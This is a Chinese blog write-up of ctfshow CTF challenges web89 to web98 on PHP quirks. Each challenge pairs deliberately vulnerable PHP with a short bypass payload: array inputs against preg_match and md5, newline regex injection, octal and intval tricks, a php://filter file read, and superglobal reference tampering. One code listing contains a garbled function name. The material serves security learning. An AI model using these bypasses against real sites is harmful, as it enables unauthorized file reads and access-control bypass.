php特性

PHP web安全与漏洞利用
最新推荐文章于 2024-02-12 15:43:10 发布
原创 最新推荐文章于 2024-02-12 15:43:10 发布 · 331 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

博客内容涉及多个PHP web安全相关题目,包括正则表达式、数据验证、字符串处理、文件包含、变量篡改等方面,讲解了如何防范和利用这些漏洞获取flag。

php特性

正则解释器:https://regexper.com/
在线转码:https://www.matools.com/hex

web89

<?php
include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

preg_match只能匹配字符串,如果传入数组返回flase
?num[]=1

web90

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

强比较,类型一样,值一样
绕过类型 小数点 后加字母 4476a 科学计数法 4476e0
补充: 正负号,16进制,8进制,8进制加空格

web91

<?php
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

im匹配多行
i匹配1行
payload 1%0aphp
%0a解码为换行符

web92

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

intval取整
payload ?num=4476.123
4476.123!=4476$intval(4476.123)==4476

web93

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

92的题解仍然可以 08进制,8进制加空格也行

web94

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!c($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

strpos:查找 “php” 在字符串中第一次出现的位置
payload ?num=4476.0123
0没有的话第二个if过不去

web95

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

.过滤无法用小数点
改用空格+8进制

web96

<?php
highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

php伪协议
php://filter/read=conver.base64-encode/resource=flag.php
?u=php://filter/resource=flag.php
emmmm只是弱比较,认真了。。。。payload: ./flag.php

web97

 <?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

md5碰撞???
a[]=1&b[]=2

web98

<?php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>

改一下

<?php
include('flag.php');
if($_GET){
$_GET=&$_POST;//只要有输入的get参数就将get方法改变为post方法(修改了get方法的地)
}else{
"flag";
} i
f($_GET['flag']=='flag'){
$_GET=&$_COOKIE;
}else{
'flag';
}
if($_GET['flag']=='flag'){
$_GET=&$_SERVER;
}else{
'flag';
} i
f($_GET['HTTP_FLAG']=='flag'){//需要满足这个条件就可以输出flag
highlight_file($flag);
}else{
highlight_file(__FILE__);
}

所以我们只需要 GET一个?HTTP_FLAG=flag 加 POST一个HTTP_FLAG=flag 中间的代码没有作用,因为我们不提交 flag 参数
这题有点绕。。。

ctfshow web入门 php特性
Sentiment的博客
04-11 5916
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
ctfshow PHP特性(89-115)【学习记录】
ximo的博客
02-17 642
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过正
<?php show_source(__FILE__); $mess=$_POST['mess']; if(preg_match("/[a-zA-Z]/",$mess)){     die("inva...
weixin_35752122的博客
01-02 365
这是一段PHP代码。它首先使用了函数 show_source 显示当前文件的源代码,然后从POST变量中获取名为mess的值并将其赋值给变量 $mess。接下来,使用preg_match函数检测 $mess 中是否包含英文字母,如果包含就输出 "invalid input!" 并终止程序。最后,使用 eval 函数对 $mess 进行代码求值。 ...
文件包含漏洞总结
金色%夕阳的博客
08-19 1907
文件包含漏洞总结 CTF中文件包含漏洞 0x01 什么是文件包含漏洞 0X02 文件包含漏洞的环境要求 0X03 常见文件包含函数 0X04 PHP伪协议 1、PHP://INPUT 2、PHP://FILTER 3、ZIP:// 4、DATA://与PHAR:// 0x05 包含APACHE日志文件 0x0
BUU刷题Day7
姜小孩的博客
03-30 1983
[BJDCTF2020]Mark loves cat [安洵杯 2019]easy_web [NCTF2019]Fake XML cookbook MD5强碰撞 XXE
靶场php特性php特性
01-31
靶场环境对于学习和掌握PHP特性至关重要。通过模拟真实环境,开发者可以实践以下技能: 1. **安全编程**:靶场通常包含各种安全漏洞示例,如SQL注入、XSS攻击、CSRF等,学习者可以通过修复这些漏洞来了解如何编写...
PHP特性
流楚丶格念的博客
12-22 4047
特性1. 变量作用域2. 超全局变量2.1. $GLOBALS3. 常量定义与使用3.1. 定义常量3.2. 使用常量 1. 变量作用域 关于变量作用域这一点,PHP 与绝大多数语言也都不同:默认函数内不能访问函数所在作用域的成员。在 JavaScript 中,我们可以在函数作用域中使用父级作用域中的成员: var top = 'top variable' function foo () { var sub = 'sub variable' console.log(top) // => `top v
贷齐乐利用hpp+php特性进行注入
01-08
贷齐乐利用hpp+php特性进行注入
CTF中的PHP特性
qq_45086218的博客
02-26 5808
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
PHP特性知识点总结
最新发布
m0_73605862的博客
02-12 2030
(1)类型转换之前提到过的是字符串转为整型。其实php手册里面提到了各种类型的转换。先把他放在这里。我们按照php手册上的顺序来介绍,只介绍几个比较常用的。①转化为bool②转化为整型int。
ctfshow php特性系列
xiaolong22333的博客
04-18 5185
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性(89-102)
weixin_28909295的博客
04-01 1180
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
PHP特性篇(web89-103)
2301_80470992的博客
01-31 927
哈希函数的设计目标是使得对于不同的输入数据,尽可能产生不同的哈希值,并且保证相同的数据输入会产生相同的哈希值。如果哈希值相等,脚本将输出 "flag" 变量的值。这是一个简单的防御机制,用于防止恶意用户通过修改 "num" 参数来直接访问 "flag" 信息。这是一个简单的防御机制,用于防止恶意用户通过修改 "num" 参数来直接访问 "flag" 信息。不等于 "4476",不包含小写字母,并且不包含字符 "0",脚本将尝试将其转换为整数。不以 "php" 开头,它将输出 "flag" 信息。
MOCTF-Web(writeup)
y920312的专栏
09-21 490
WEB 1、一道水题 查看源代码,得到flag moctf{easy_source_code} 2、还是水题 直接post参数password=moctf,得到flag moctf{break_the_html} 3、访问限制 Flag: moctf{http_header_1s_easy} 4、机器蛇 查看源代码,发现底部提示/robots.txt 访问/robots.txt,发现 user-agent: Disallow: /flag327a6c4304ad5938eaf0efb6c
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 934
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6551
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
ctf.show WEB入门-php特性系列
~airrudder~
09-21 2246
WEB入门 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 由于intval(array(.
ctfshowPHP特性
遇事不决冲冲冲
08-23 4748
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3718
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值